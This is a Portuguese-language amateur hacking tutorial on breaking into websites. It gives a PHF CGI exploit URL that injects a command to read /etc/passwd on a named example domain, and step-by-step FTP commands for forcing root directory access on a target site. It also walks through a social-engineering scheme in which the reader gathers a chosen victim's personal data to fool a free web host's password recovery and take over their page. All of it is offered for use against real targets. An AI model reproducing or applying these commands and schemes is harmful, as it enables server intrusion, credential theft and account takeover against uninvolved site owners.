Invadir Sites Vulneráveis( Básico )
Ataque via browser:
O ataque via browser é um dos ataques mais fáceis de executar, mas não da nem 50% de sucessos. Vou tentar explicar como você usa esse método:
Primeiramente você tem que entender o que está fazendo, não adianta selecionar a dica aperta CTRL+C e colocar no navegador achando que ele vai fazer tudo para você não, entenda:
Bom, como já sabe o geralmente o arquivo “passwd” é o que contém os passwords encripitados (se você não sabe ainda, aprenda um pouco sobre o UNIX) , existem vários servidores que só Root pode entrar no diretório “/etc“, para outros usuários é bloqueado o acesso a esse diretório, mas existe um método para tentar pegar esse arquivo. No diretório /cgi-bin do Web Server (Pagina WEB do servidor) geralmente contém um arquivos chamdo PHF. O PHF permite aos usuários ganhar acesso remoto para arquivos (inclusive o /etc/passwd). Então através desse arquivo você pode tentar pegar a lista de passwords, é muito simples, apenas digite essa URL no seu browser:
Então substitua o “sitevuneravel” pelo endereço do servidor que você quer hackear.
Ex:http://www.tba.com.br/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Invadir Site por FTP:
vai no iniciar --> executar --> digite cmd --> e dê ENTER
vai aparecer uma tela preta la vc coloca FTP e da enter!!
depois vc escreve "OPEN"(sem aspas). ae vai aparecer "para"(sem aspas) (ae vc escreve ftp.(qual quer site que vc quer hackiar) obs:tira o www e substitua por FTP!!!
Obs:
naum sao todos os sites que dao para fazer isso!!
ae vai aparecer conectado ao xxx.xxx.xxx,
vai aparecer LOGIN --> dê ENTER,
depois que vc der enter vai aparecer SENHA --> dê ENTER
vai aparecer que deu falha no logon naum se preocupe pq sempre aparece isso.
ae vc escreve: quote user ftp --> e da ENTER
depois escreve: quote cwd~root e da ENTER
depois: quote pass ftp da ENTER
e depois para acabar escreva:dir e da enter...
depois disso se vc kiser ver se vc consiguiU hackiar vc vai na url e escreve assim ftp.ositequevcpois.com e da enter ae vc vai ve as pastas do site.
Obs:
naum jogue nd fora pq quem faz isso é cracker não hacker!Free Web Sites
O serviço de Hosting Gratis de WebPages é feito por empresas como a Tripod and Geocities, que dá espaço de graça e ganha dinheiro com propaganda. Há maneiras de hackear essas empresas e ter acesso à todas as senhas/usernames, mas é algo que seria complexo para a maioria das pessoas. Esse método que vai ser explicado é simples engenharia social, o que não é muito dificil de se fazer. Então, não se ache um Hacker de Elite só porque vc zuou a webpage de uma pobre pessoa que apenas esqueceu algumas informações pessoais na própria Page.
Tudo que vc tem que fazer é abrir uma conta num serviço de e-mail (ex.:Hotmail) e escolher uma vítima. Vc precisará achar a data de nascimento, o nome, e o e-mail antigo da pessoa, e se possivel, o endereço dela. Resumindo… Consiga o MAXIMO de info que vc puder sobre ela.
Todas essas empresas têm um serviço de verificação para pessoas que perderam a password da sua Page. Quando vc tiver o maximo de informações sobre a pessoa, mande um e-mail para a empresa dizendo que vc mudou de e-mail. ESPERE duas semanas e mande outro. Só que nesse, diga que vc perdeu a sua password. Na maioria das vezes eles te mandam um e-mail de volta, dizendo que vc precisa confirmar alguns dados pessoais seus, como a data de nascimento ou endereço.
Tudo o que vc tem de fazer é mandar todas as informações que vc conseguiu, e esperar a password chegar fresquinha no seu e-mail.
Por outro lado, companhias como a Geocities são muito ocupadas para ficar respondendo e-mails de perda de password, então eles fizeram uma pagina onde membros podem pegar suas password’z de volta.
Código:
http://www.geocities.com/help/pass_form.html
